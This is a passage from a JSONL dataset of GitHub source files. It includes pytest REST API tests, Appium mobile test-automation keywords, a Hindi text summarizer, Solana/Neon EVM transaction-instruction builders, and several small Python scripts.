event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n def on_move(self, event):\r\n curX, curY = (event.x, event.y)\r\n\r\n # expand rectangle as you drag the mouse\r\n if self.start_x is not None:\r\n self.canvas.coords(self.line, self.start_x, self.start_y, curX, curY)\r\n\r\n def on_button3_press(self, event):\r\n self.canvas.delete('lines')\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n\r\ndef main():\r\n pyautogui.screenshot('screenshot.jpg', region=(0, 0, 1920, 1080))\r\n draw = Drawing()\r\n draw.mainloop()\r\n","repo_name":"NovakWilson/projectt","sub_path":"drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14868206940","text":"import pytest\nfrom api import Restful\n\nhost = 'http://localhost:32768'\n\n\ndef create_new(type_b, name, age):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # create new\n res = Restful(host).create_new_bear(param_dict)\n res_stat = res.status_code\n\n list_r[3] = str(res_stat)\n if res_stat != 500:\n created_id = int(res.content)\n print('id new objeckt: ', created_id,'the collected parameters: ', param_dict, \\\n 'status_code: ',res_stat)\n\n # check type created obj\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :',list_r)\n return list_r\n\n\ndef create_one():\n param_dict = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param_dict)\n return int(res.content)\n\n\ndef update(type_b, name, age, created_id):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # update param\n res = Restful(host).update_bear(created_id, param_dict)\n list_r[3] = str(res.status_code)\n\n # check update\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :', list_r)\n return list_r\n\n\ndef test_dellete_one():\n param = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param)\n created_id = int(res.content)\n print('created_id :', created_id, ' ', param, ' ', res.status_code)\n # dell by id\n Restful(host).dell_bear(created_id)\n # check odj by id dellete\n res = Restful(host).read_bear(created_id)\n assert res.content == b'EMPTY'\n\n\nclass Parametrs_bear:\n def param(self, type_b, name, age):\n param_dict = {\"bear_type\": type_b, \"bear_name\": name, \"bear_age\": age}\n return param_dict\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('POLAR', 'mihail', 17.5, '200'),\n ('BROWN', 'mihail', 17.5, '200'),\n ('BLACK', 'mihail', 17.5, '200'),\n ('GUMMY', 'mihail', 17.5, '200'),\n ('', 'mihail', 17.5, '500'),\n ('BROWN', '', 17.5, '500'),\n ('BLACK', 'mihail', '', '500'),\n ('BLACK', 'mihail', 0, '200'),\n ('black', 'mihail', 10, '500'),\n ('white', 'mihail', 10, '500'),\n (0, 'mihail', 10, '500'),\n ('BLACK', 'm' * 100, 10, '200'),\n ('BLACK', 'm' * 1000, 10, '200'),\n ('BLACK', 'mihail', -0.1, '200'),\n ('BLACK', 'mihail', 200, '500'),\n\n ]\n )\ndef test_create(type_b, name, age, res):\n l_res = create_new(type_b, name, age)\n n_res = l_res[3]\n if age != '' and age < 0:\n age = 0\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name.upper() in l_res[1]\n assert age == l_res[2]\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('BROWN', 'mihail', 17.5, '200'),\n ('POLAR', 'Change_Name', 17.5, '200'),\n ('POLAR', 'mihail', 10, '200'),\n ]\n )\ndef test_update(type_b, name, age, res):\n l_res = update(type_b, name, age, create_one())\n n_res = l_res[3]\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name in l_res[1]\n assert age == l_res[2]\n\n\ndef test_dellete_all():\n # clear base\n Restful(host).dell_all_bear()\n # check base == []\n res = Restful(host).read_all_bears().json()\n assert res == []\n","repo_name":"Polenichko/Alaska_bears","sub_path":"tests_script.py","file_name":"tests_script.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23775447961","text":"import kubernetes\n\n\nif __name__ == \"__main__\":\n kubernetes.config.load_kube_config()\n api = kubernetes.client.CoreV1Api()\n # a = api.read_namespace('default')\n # print(a.metadata.name)\n custom_obj_api = kubernetes.client.CustomObjectsApi()\n\n tenants = custom_obj_api.list_cluster_custom_object('ip.demo.com', 'v1', 'tenants')\n print(tenants['items'])\n # old = ['user1@demo.com', 'user2@demo.com']\n # new = ['user1@demo.com', 'user3@demo.com']\n\n # print(f\"new: {set(new) - set(old)}\")\n \n # print(f\"removed: {set(old) - set(new)}\")","repo_name":"JasperJiang/KubernetesCRDPlay","sub_path":"kubectl.py","file_name":"kubectl.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6069553232","text":"from selenium import webdriver\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom time import sleep\nimport re\n\nfrom sweet import log, vars\nfrom sweet.utility import compare, replace, json2dict\n\nfrom sweet.modules.mobile.window import Windows\nfrom sweet.modules.web.locator import locating\nfrom sweet.modules.web.config import *\n\n\nclass App:\n\n keywords = keywords\n\n def __init__(self, setting):\n self.action = {}\n platform = setting.get('platformName', '')\n # snapshot = setting.pop('snapshot', False)\n\n if platform.lower() == 'ios':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n elif platform.lower() == 'android':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n # 等待元素超时时间\n self.driver.implicitly_wait(element_wait_timeout) # seconds\n # 页面刷新超时时间\n self.driver.set_page_load_timeout(page_flash_timeout) # seconds\n self.w = Windows()\n self.w.driver = self.driver\n\n def _close(self):\n pass\n\n def _call(self, step):\n # 处理截图数据\n # snap = Snapshot()\n # snap.pre(step)\n\n context = replace(step.get('frame', '')).strip()\n self.w.switch_context(context)\n\n if self.w.current_context.startswith('WEBVIEW'):\n # 切换标签页\n tab = step['data'].get('#tab')\n if tab:\n del step['data']['#tab']\n self.driver.switch_to_window(self.w.windows[tab])\n log.debug(f'current context: {repr(self.w.current_context)}')\n\n # 根据关键字调用关键字实现\n element = getattr(self, step['keyword'].lower())(step)\n # snap.web_shot(step, element)\n\n\n def title(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.title)}')\n\n if data['text'].startswith('*'):\n assert data['text'][1:] in self.driver.title\n else:\n assert data['text'] == self.driver.title\n # 只能获取到元素标题\n for key in output:\n vars.put({key: self.driver.title})\n\n\n def current_url(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.current_url)}')\n try:\n if data['text'].startswith('*'):\n assert data['text'][1:] in self.driver.current_url\n else:\n assert data['text'] == self.driver.current_url\n except:\n raise Exception(\n f'check failure, DATA:{data[\"text\"]}, REAL:{self.driver.current_url}')\n # 只能获取到元素 url\n for key in output:\n vars.put({key: self.driver.current_url})\n return self.driver.current_url\n\n def locat(self, element, action=''):\n if not isinstance(element, dict):\n raise Exception(f'no this element:{element}')\n\n\n def open(self, step):\n url = step['element']['value']\n\n if step['data'].get('#clear', ''):\n self.driver.delete_all_cookies()\n\n self.driver.get(url)\n\n cookie = step['data'].get('cookie', '')\n if cookie:\n self.driver.add_cookie(json2dict(cookie))\n co = self.driver.get_cookie(json2dict(cookie).get('name', ''))\n log.debug(f'cookie is add: {co}')\n sleep(0.5)\n\n\n def check(self, step):\n data = step['data']\n if not data:\n data = step['expected']\n\n element = step['element']\n by = element['by']\n output = step['output']\n\n if by in ('title', 'current_url'):\n getattr(self, by)(data, output)\n else:\n location = self.locat(element)\n for key in data:\n # 预期结果\n expected = data[key]\n # 切片操作处理\n s = re.findall(r'\\[.*?\\]', key)\n if s:\n s = s[0]\n key = key.replace(s, '')\n\n if key == 'text':\n real = location.text\n else:\n real = location.get_attribute(key)\n if s:\n real = eval('real' + s)\n\n log.debug(f'DATA:{repr(expected)}')\n log.debug(f'REAL:{repr(real)}')\n try:\n compare(expected, real)\n except:\n raise Exception(\n f'check failure, DATA:{repr(expected)}, REAL:{repr(real)}')\n\n # 获取元素其他属性\n for key in output:\n if output[key] == 'text':\n v = location.text\n vars.put({key: v})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n v = location.text[:-3]\n vars.put({key: v})\n else:\n v = location.text\n vars.put({key: v})\n else:\n v = location.get_attribute(output[key])\n vars.put({key: v})\n\n\n def notcheck(self, step):\n try:\n self.check(step)\n raise Exception('check is success')\n except:\n pass\n\n def input(self, step):\n data = step['data']\n location = self.locat(step['element'])\n\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.send_keys(*data[key])\n elif location:\n location.send_keys(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.send_keys(d)\n sleep(0.3)\n\n def set_value(self, step):\n data = step['data']\n location = self.locat(step['element'])\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.set_value(*data[key])\n elif location:\n location.set_value(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.set_value(d)\n sleep(0.3)\n\n def click(self, step):\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n for element in elements:\n location = self.locat(element, 'CLICK')\n sleep(0.5)\n try:\n location.click()\n except ElementClickInterceptedException: # 如果元素为不可点击状态,则等待1秒,再重试一次\n sleep(1)\n location.click()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def tap(self, step):\n action = TouchAction(self.driver)\n\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n\n for element in elements:\n if ',' in element:\n position = element.split(',')\n x = int(position[0])\n y = int(position[1])\n position = (x, y)\n self.driver.tap([position])\n sleep(0.5)\n else:\n location = self.locat(element, 'CLICK')\n action.tap(location).perform()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name}) \n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def press_keycode(self, step):\n element = step['element']\n self.driver.press_keycode(int(element))\n\n def swipe(self, step):\n elements = step['elements']\n duration = step['data'].get('持续时间', 0.3)\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n start = elements[0].replace(',', ',').split(',')\n start_x = int(start[0])\n start_y = int(start[1])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n if duration:\n self.driver.swipe(start_x, start_y, end_x,\n end_y, sleep(float(duration)))\n else:\n self.driver.swipe(start_x, start_y, end_x, end_y)\n\n def line(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 1, '坐标格式或数量不对,正确格式如:258,756|540,1032'\n postions = []\n for element in elements:\n element = element.replace(',', ',')\n p = element.split(',')\n postions.append(p)\n\n action = TouchAction(self.driver)\n action = action.press(\n x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n for i in range(1, len(postions)):\n action.move_to(x=postions[i][0], y=postions[i]\n [1]).wait(duration * 1000)\n action.release().perform()\n\n def line_unlock(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 2, '坐标格式或数量不对,正确格式如:lock_pattern|1|4|7|8|9'\n location = self.locat(elements[0]) \n rect = location.rect\n w = rect['width'] / 6\n h = rect['height'] / 6\n\n key = {}\n key['1'] = (rect['x'] + 1 * w, rect['y'] + 1 * h)\n key['2'] = (rect['x'] + 3 * w, rect['y'] + 1 * h)\n key['3'] = (rect['x'] + 5 * w, rect['y'] + 1 * h)\n key['4'] = (rect['x'] + 1 * w, rect['y'] + 3 * h)\n key['5'] = (rect['x'] + 3 * w, rect['y'] + 3 * h)\n key['6'] = (rect['x'] + 5 * w, rect['y'] + 3 * h)\n key['7'] = (rect['x'] + 1 * w, rect['y'] + 5 * h)\n key['8'] = (rect['x'] + 3 * w, rect['y'] + 5 * h)\n key['9'] = (rect['x'] + 5 * w, rect['y'] + 5 * h)\n\n action = TouchAction(self.driver)\n for i in range(1, len(elements)):\n k = elements[i]\n if i == 1:\n action = action.press(\n x=key[k][0], y=key[k][1]).wait(duration * 1000)\n action.move_to(x=key[k][0], y=key[k][1]).wait(duration * 1000)\n action.release().perform()\n\n def rocker(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n rocker_name = step['data'].get('摇杆', 'rocker')\n release = step['data'].get('释放', False)\n\n # if isinstance(element, str):\n # if element:\n # element = [element]\n # else:\n # element = []\n\n postions = []\n for element in elements:\n element = element.replace(',', ',')\n p = element.split(',')\n postions.append(p)\n\n # 如果 action 中么有此摇杆名,则是新的遥感\n if not self.action.get(rocker_name):\n self.action[rocker_name] = TouchAction(self.driver)\n self.action[rocker_name].press(\n x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n # 新摇杆的第一个点已操作,需要删除\n postions.pop(0)\n # 依次操作\n for i in range(len(postions)):\n self.action[rocker_name].move_to(\n x=postions[i][0], y=postions[i][1]).wait(duration * 1000)\n\n if release:\n # 释放摇杆,并删除摇杆\n self.action[rocker_name].release().perform()\n del self.action[rocker_name]\n else:\n self.action[rocker_name].perform()\n\n def scroll(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '元素格��或数量不对,正确格式如:origin_el|destination_el'\n origin = self.locat(elements[0])\n destination = self.locat(elements[1])\n self.driver.scroll(origin, destination)\n\n def flick_element(self, step):\n elements = step['elements']\n speed = step['data'].get('持续时间', 10)\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:elment|200,300'\n location = self.locat(elements[0])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n if speed:\n self.driver.flick_element(location, end_x, end_y, int(speed))\n\n def flick(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n start = elements[0].replace(',', ',').split(',')\n start_x = int(start[0])\n start_y = int(start[1])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n self.driver.flick(start_x, start_y, end_x, end_y)\n\n def drag_and_drop(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '元素格式或数量不对,正确格式如:origin_el|destination_el'\n origin = self.locat(elements[0])\n destination = self.locat(elements[1]) \n self.driver.drag_and_drop(origin, destination)\n\n def long_press(self, step):\n action = TouchAction(self.driver)\n\n element = step['element']\n duration = step['data'].get('持续时间', 1000)\n if ',' in element or ',' in element:\n position = element.replace(',', ',').split(',')\n x = int(position[0])\n y = int(position[1])\n action.long_press(x=x, y=y, duration=duration).perform()\n else:\n location = self.locat(element)\n action.long_press(location, duration=duration).perform()\n sleep(0.5)\n\n def pinch(self, step):\n element = step['element']\n location = self.locat(element)\n percent = step['data'].get('百分比', 200)\n steps = step['data'].get('步长', 50)\n self.driver.pinch(location, percent, steps)\n\n def zoom(self, step):\n element = step['element']\n location = self.locat(element)\n percent = step['data'].get('百分比', 200)\n steps = step['data'].get('步长', 50)\n self.driver.zoom(location, percent, steps)\n\n def hide_keyboard(self, step):\n self.driver.hide_keyboard()\n\n def shake(self, step):\n self.driver.shake()\n\n def launch_app(self, step):\n self.driver.launch_app()\n\n def is_locked(self, step):\n status = self.driver.is_locked()\n assert status, \"it's not locked\"\n\n def lock(self, step):\n self.driver.lock()\n\n def unlock(self, step):\n self.driver.unlock()","repo_name":"tonglei100/sweetest","sub_path":"sweet/modules/mobile/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":607,"dataset":"github-code","pt":"53"} +{"seq_id":"27268875644","text":"from rest_framework import serializers\n\nfrom users.models import User\nfrom api_yamdb.settings import RESERVED_NAME\n\n\ndef validate_users(self, data):\n if_username = User.objects.filter(username=data.get('username'))\n if_email = User.objects.filter(email=data.get('email'))\n if User.objects.filter(username=data.get('username'),\n email=data.get('email')).exists():\n return data\n if if_email:\n raise serializers.ValidationError(f'Почта {if_email}'\n f'уже использовалась')\n if if_username:\n raise serializers.ValidationError(f'Имя {if_username}'\n f'уже использовалось')\n if str(data.get('username')).lower() == RESERVED_NAME:\n raise serializers.ValidationError('Нельзя использовать имя me')\n return data\n","repo_name":"MihaRooll/yamdb_final","sub_path":"api_yamdb/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19558735726","text":"from django.shortcuts import render\nimport numpy as np\nimport sys\nimport pandas as pd\nimport nltk\nimport re\nimport codecs\nfrom hindi_summarizer.sent_segment import sent_tokenize\nfrom hindi_summarizer.word_segment import Tokenizer\nfrom bs4 import BeautifulSoup as bs\nimport requests as r\nimport networkx as nx\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport json\n#from hindi_summarizer.w2v import vocab\ndef main(l):\n try:\n if(l[0:12]==\"https://www.\"):\n all_of_it=\"\"\n req=r.get(l)\n con=req.content\n soup=bs(con,'html.parser')\n txt=soup.find_all('p')\n for i in txt:\n all_of_it+=i.text\n else:\n all_of_it=l\n print(all_of_it)\n out=re.split(',|\\.|\\|',all_of_it)\n sentences = sent_tokenize(all_of_it)\n with open('hindi_summarizer\\Aembed_hin.json',encoding='utf8') as f:\n word_embeddings=json.load(f)\n vectors=[]\n l=[]\n [l.append(0) for i in range(100)]\n for i in sentences:\n if len(i) != 0:\n v = sum([np.array(word_embeddings.get(w,l)) for w in i])/(len(i)+0.001)\n else:\n v = np.zeros((100,))\n vectors.append(v)\n print(vectors)\n mat = np.zeros([len(sentences), len(sentences)])\n for i in range(len(sentences)):\n for j in range(len(sentences)):\n if i != j:\n mat[i][j] = cosine_similarity(vectors[i].reshape(1,100),vectors[j].reshape(1,100))[0,0]\n nx_graph = nx.from_numpy_array(mat)\n hubs,scores = nx.hits(nx_graph,max_iter=100000000000000000000000000000000000)\n ranked_sentences = sorted(((scores[i],s) for i,s in enumerate(out)), reverse=True)\n c=0\n s=\"\"\n inl=[]\n k=0.2*len(out)\n for i in ranked_sentences:\n c+=1\n s+=i[1]+'|'\n if(c>k):\n break\n inl.append(s)\n inl.append(all_of_it)\n return inl\n except:\n inl=[]\n inl.append(\"Sorry for the inconvenience our backend does not support articles with bad encoding patterns please try with other websites or try copy pasting text instead of giving the link\")\n inl.append(l)\n return(l)\n","repo_name":"pramod-mamidi/hindi-and-english-text-summarizer","sub_path":"hindi_summarizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4070657338","text":"NUMBER_OF_SENSORS = 8\nPLOTS_PER_ROw = 3\n\nplots = {\n # default plot parameters\n 'default': {\n 'title': 'Sensor {index}',\n 'color': '6F6',\n 'xrange': [0, 1000],\n 'yrange': [0, 10],\n 'fill': False,\n 'show': True,\n 'link_master': True\n },\n\n # specialized parameters\n 0: {\n 'title': 'Meh',\n 'color': '67C8FF',\n 'yrange': [40, 160],\n 'link_master': False\n },\n 5: {\n 'yrange': [0, 700],\n 'color': 'F66'\n },\n 4: {\n 'fill': '6F63'\n },\n\n #special plots\n 'time': {\n 'show': True,\n 'title': 'Time between updates'\n },\n 'master': {\n 'show': False\n }\n}\n\ntarget_period = 0.01\n\n# defines basic calibration/transformation functions\ntransform = {\n 'default': None,\n # scale [0,1024) => [50,150)\n 0: lambda x: x/1024*100+50,\n # identity\n 3: lambda x: x,\n}\n\n# export to file\nexport = {\n 'raws': {\n 'format': 'text',\n 'stage': 'acquisition',\n 'filename': 'data/raw_data.data'\n },\n 'transformed': {\n 'format': 'text',\n 'stage': 'transform',\n 'filename': 'data/scaled_data.data'\n }\n}","repo_name":"mvonthron/plotsplotsplots","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10376479947","text":"import hashlib\nimport json\nimport math\nimport random\n\nimport base58\nfrom solana.publickey import PublicKey\nfrom solana.system_program import SYS_PROGRAM_ID\nfrom solana.transaction import AccountMeta, TransactionInstruction\nfrom spl.token.constants import ASSOCIATED_TOKEN_PROGRAM_ID, TOKEN_PROGRAM_ID\nfrom spl.token.instructions import get_associated_token_address\n\nCOMPUTE_BUDGET_ID: PublicKey = PublicKey(\n \"ComputeBudget111111111111111111111111111111\")\nDEFAULT_UNITS = 500 * 1000\nDEFAULT_HEAP_FRAME = 256 * 1024\n\n\nclass Instruction:\n @staticmethod\n def account_v3(solana_wallet, neon_wallet_pda,\n neon_wallet, evm_loader_id) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=solana_wallet,\n is_signer=True, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=neon_wallet_pda,\n is_signer=False, is_writable=True),\n ]\n\n data = bytes.fromhex('28') + bytes.fromhex(str(neon_wallet)[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def sync_native(account: PublicKey):\n keys = [AccountMeta(pubkey=account, is_signer=False, is_writable=True)]\n data = bytes.fromhex('11')\n return TransactionInstruction(keys=keys, program_id=TOKEN_PROGRAM_ID, data=data)\n\n\n @staticmethod\n def deposit(solana_pubkey, neon_pubkey, deposit_pubkey,\n neon_wallet_address, neon_mint, evm_loader_id) -> TransactionInstruction:\n associated_token_address = get_associated_token_address(\n solana_pubkey, neon_mint)\n pool_key = get_associated_token_address(deposit_pubkey, neon_mint)\n keys = [\n AccountMeta(pubkey=associated_token_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=pool_key, is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_pubkey, is_signer=False, is_writable=True),\n AccountMeta(pubkey=TOKEN_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=solana_pubkey,\n is_signer=True, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n ]\n\n data = bytes.fromhex('27') + bytes.fromhex(neon_wallet_address[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def compute_budget_utils(operator, units=DEFAULT_UNITS) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"02\") + units.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def request_heap_frame(operator, heap_frame=DEFAULT_HEAP_FRAME) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"01\") + heap_frame.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def associated_token_account(\n payer: PublicKey,\n associated_token: PublicKey,\n owner: PublicKey,\n mint: PublicKey,\n instruction_data: bytes,\n programId=TOKEN_PROGRAM_ID,\n associatedTokenProgramId=ASSOCIATED_TOKEN_PROGRAM_ID) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=payer, is_signer=True, is_writable=True),\n AccountMeta(pubkey=associated_token,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=owner, is_signer=False, is_writable=False),\n AccountMeta(pubkey=mint, is_signer=False, is_writable=False),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=programId, is_signer=False, is_writable=False),\n ]\n\n return TransactionInstruction(\n keys=keys,\n program_id=associatedTokenProgramId,\n data=instruction_data\n )\n\n @staticmethod\n def claim(_from, to, amount, web3_client, ata_address,\n emulate_signer, contract, gas_price=None):\n emulated_tx = None\n result = dict()\n\n claim_to = contract.contract.functions.claimTo(\n bytes(ata_address), _from.address, amount)\n data = claim_to.abi\n\n tx = {\n \"from\": _from.address,\n \"to\": to,\n \"nonce\": web3_client.eth.get_transaction_count(emulate_signer.address),\n \"gasPrice\": gas_price if gas_price is not None else web3_client.gas_price(),\n \"chainId\": web3_client._chain_id,\n \"data\": json.dumps(data).encode('utf-8'),\n \"gas\": 100000000\n }\n\n signed_tx = web3_client._web3.eth.account.sign_transaction(\n tx, _from.key)\n\n if signed_tx.rawTransaction is not None:\n emulated_tx = web3_client.get_neon_emulate(\n str(signed_tx.rawTransaction.hex())[2:])\n\n if emulated_tx is not None:\n for account in emulated_tx['result']['accounts']:\n key = account['account']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n if 'contract' in account:\n key = account['contract']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n for account in emulated_tx['result']['solana_accounts']:\n key = account['pubkey']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n return signed_tx, result\n\n @staticmethod\n def buld_tx_instruction(solana_wallet, neon_wallet, neon_raw_transaction,\n neon_keys, evm_loader_id, neon_pool_count):\n program_id = PublicKey(evm_loader_id)\n treasure_pool_index = math.floor(random.randint(\n 0, 1) * int(neon_pool_count)) % int(neon_pool_count)\n treasure_pool_address = get_collateral_pool_address(\n treasure_pool_index, evm_loader_id)\n\n data = bytes.fromhex('1f') + treasure_pool_index.to_bytes(4, 'little') + \\\n bytes.fromhex(str(neon_raw_transaction.hex())[2:])\n keys = [AccountMeta(pubkey=solana_wallet, is_signer=True, is_writable=True),\n AccountMeta(pubkey=treasure_pool_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_wallet,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=program_id, is_signer=False,\n is_writable=False),\n ]\n\n for k in neon_keys:\n keys.append(neon_keys[k])\n\n return TransactionInstruction(\n keys=keys,\n program_id=program_id,\n data=data\n )\n\n\ndef get_collateral_pool_address(index: int, evm_loader_id):\n return PublicKey.find_program_address(\n [bytes('treasury_pool', 'utf8'), index.to_bytes(4, 'little')],\n PublicKey(evm_loader_id)\n )[0]\n\n\ndef get_solana_wallet_signer(solana_account, neon_account, web3_client):\n solana_wallet = base58.b58encode(str(solana_account.public_key))\n neon_wallet = bytes(neon_account.address, 'utf-8')\n new_wallet = hashlib.sha256(solana_wallet + neon_wallet).hexdigest()\n emulate_signer_private_key = f'0x{new_wallet}'\n return web3_client._web3.eth.account.from_key(emulate_signer_private_key)\n","repo_name":"neonevm/neon-tests","sub_path":"utils/instructions.py","file_name":"instructions.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27085334249","text":"\n\nwhile True:\n n1=input('Digite um numero:')\n operador=input ('Digite um operador[/*+-]:')\n n2=input('Digite um outro numero :')\n\n numeros_validos=None\n n1_float=0\n n2_float=0\n try:\n n1_float=float(n1)\n n2_float=float(n2)\n numeros_validos=True\n\n except Exception as error:\n \n print(error)\n\n\n if numeros_validos is None:\n print('Um ou ambos os numeros digitados são invalidos')\n continue\n operadores_permitidos='/*+-'\n if operador not in operadores_permitidos:\n print('Operador invalido')\n\n if len(operador)>1:\n print('Digite um unico operador')\n continue\n print('Realizando calculo')\n if operador =='+': \n print(n1_float+n2_float)\n elif operador =='-':\n \n print(n1_float-n2_float)\n elif operador =='*':\n \n print(n1_float*n2_float)\n elif operador =='/':\n \n 